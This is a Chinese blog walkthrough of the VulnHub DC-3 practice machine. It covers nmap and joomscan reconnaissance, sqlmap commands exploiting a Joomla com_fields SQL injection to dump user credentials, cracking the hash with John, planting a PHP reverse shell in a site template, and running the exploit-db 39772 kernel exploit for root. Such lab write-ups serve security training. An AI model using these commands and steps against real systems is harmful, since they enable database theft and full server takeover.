vulnhub靶机渗透DC-3

最新推荐文章于 2024-05-20 20:06:25 发布
最新推荐文章于 2024-05-20 20:06:25 发布
阅读量69 收藏
点赞数
分类专栏: 靶机笔记 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129614570
版权

靶机入侵——DC3-2

1、环境搭建

下载地址:https://www.vulnhub.com/entry/dc-32,312/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
    在这里插入图片描述

    192.168.80.131 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.131

    在这里插入图片描述

  • web端进一步信息收集
    在这里插入图片描述

​ 通过wappalyzer我们发现网站基本信息

  • 我们发现网站cms为joomla,我们使用kail中其专门的扫描器Joomscan对网站扫描

    执行joomscan -url 192.168.80.131 对网站进行扫描。得到其cms版本信息,及敏感目录。
    在这里插入图片描述

  • 对网站后台登录功能进行测试:弱口令、SQL注入········ 。未找到利用点

3、漏洞利用

  • 通过搜素cms版本历史漏洞信息发现其存在SQL注入漏洞。参考链接:https://blog.csdn.net/qq_48985780/article/details/121654759

    使用sqlmap对网站进行攻击:sqlmap -u “http://192.168.80.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
    在这里插入图片描述

  • 破解出存在5个数据库,我们选择可能性最大的joomladb,继续爆破数据表

    sqlmap -u “http://192.168.80.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
    在这里插入图片描述

  • 发现了76个表,用户名和密码很可能存在#__users 这个表里,继续爆破它的字段

    sqlmap -u “http://192.168.80.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T “#__users” --columns -p list[fullordering]
    在这里插入图片描述

  • 继续爆破字段,这里选择的是name,username,password三个字段

    sqlmap -u “http://192.168.80.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T “#__users” -C name,username,password --dump -p list[fullordering]
    在这里插入图片描述

  • 得到用户名及密码密文后,即可对密文解密。可以通过在线解密网站解密,也可以使用工具解密(最好定制对应字典)。在线网站解密了一波,没解析出来。使用John工具撞库,将password hash值保存成文本文件hash.txt,接着输入 John hash.txt
    在这里插入图片描述

  • 解密出来是snoopy,登陆成功

  • 成功登录后台后,寻找上传点后其他可以利用getshell的利用点。在模板位置发现模板中的php文件可编辑。

  • 找到当前网站使用的模板,添加php反弹shell命令。kail开启监听,访问含反弹命令的页面。
    在这里插入图片描述
    在这里插入图片描述

  • 成功getshell

4、权限提升

  • 成功getshell后,我们需要提升权限拿到flag。输入uname -a 查看靶机系统信息或者 cat /proc/version、cat /etc/issue

    在这里插入图片描述

  • 使用searchsploit 功能搜索系统历史漏洞: searchsploit ubuntu 16.04
    在这里插入图片描述

  • 查看其exp(39772.txt)
    在这里插入图片描述
    在这里插入图片描述

  • 下载exp及其利用工具至靶机:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip (国内同步项目地址:https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip)

  • 也可以在kail中以python搭建http服务将工具下载到靶中,或使用MSF上传。这是针对一些特定的环境可以使用

    python -m SimpleHTTPServer 8888 #发布当前目录,http协议可访问

    python3使用:python -m http.server 8080
    在这里插入图片描述
    在这里插入图片描述

  • 解压文件,编译脚本,执行./doubleput 提权
    在这里插入图片描述
    在这里插入图片描述

  • 获得flag
    在这里插入图片描述

不要温顺地走进那个良夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2364
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3485
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3333
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2840
Vulnhub靶机渗透学习——DC-9
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 243
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
Vulnhub靶机DC-3 (内核exp提权)
过期的秋刀鱼
08-06 380
登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录。Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。利用John工具,对该密码进行爆破拆解,工具详细信息参考。
vulnhub靶机渗透测试DC-2靶机渗透
m0_62008601的博客
04-29 1371
攻击机-kali-IP:192.168.56.102 靶机-dc2-ip:192.168.103 关于我的这两台机子的网络设置在上一篇文章中已经提到,这里就不再叙述。 查找dc-2 的IP arp-scan-l 得到ip为192.168.56.103 扫描开启的端口 nmap -sV -p- 192.168.56.103 此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22) 因为开启了80端口,此时我们可以去访问它的web服务 此
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2455
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1824
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
网络安全行业的革命:AI大模型提示词的实战指
junge_sys的博客
05-17 559
网络安全与国家安全紧密相连,涵盖了政府治理、民生福祉、金融稳定和工业发展的核心领域。自《网络安全法》实施以来,网络安全已成为维护国家安全、推动经济社会发展的关键战略。面对2023年市场的挑战,网络安全行业仍蓬勃发展。在这个竞争激烈的环境中,AI技术成为提升工作效率的利器。Kimi、文心一言、通义千问、ChatGPT等大模型AI工具,如同战场上的AK47,但如何精准运用是关键。因此,网络安全从业者需掌握AI技术,并精选提示词,以高效应对咨询、查询、决策支持等多样化需求,为构建网络强国贡献力量。
网络安全之重发布与路由策略详解
最新发布
m0_65858385的博客
05-20 666
如果if-match没有写就默认匹配所有,如果没有写apply就相当于不做任何动作,当if-match没有写,apply也没有写的时候就代表着router-policy后跟的动作是permit就是所有都通过,若是deny就是拒绝所有(拒绝所有的话,可以不写这个router-policy,因为只要做了router-policy,其末尾就隐含了拒绝所有。都是acl这种同一类的条件就是横向,竖向就是条件都不一样,又是acl又是cost的,如果多了不同类的条件就变为竖向。特点:1、仅仅抓取路由信息。
网络安全中等保,风险评估,安全测评都是什么意思,有哪些联系
dexun123的博客
05-17 657
它的实施体现了国家在网络安全领域的坚定意志和决心。它摒弃了传统技术驱动的安全体系设计思路,转而以成本-效益平衡的原则为指导,全面审视用户关心的关键资产(如信息、硬件、软件、文档、服务、设备等)的分级,深入剖析安全威胁的可能性及严重性,并对系统物理环境、硬件设备、网络平台、基础系统平台、业务应用系统、安全管理及运行措施等多个方面的安全脆弱性进行分析。具体来说,风险评估侧重于从广泛的、战略性的角度,对被评估用户的各类重要资产进行风险级别的判断,为系统明确安全需求,并确定符合成本-效益原则的安全控制措施;
CTF网络安全大赛简单web题目:eval
Pythonit教程网
05-17 751
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值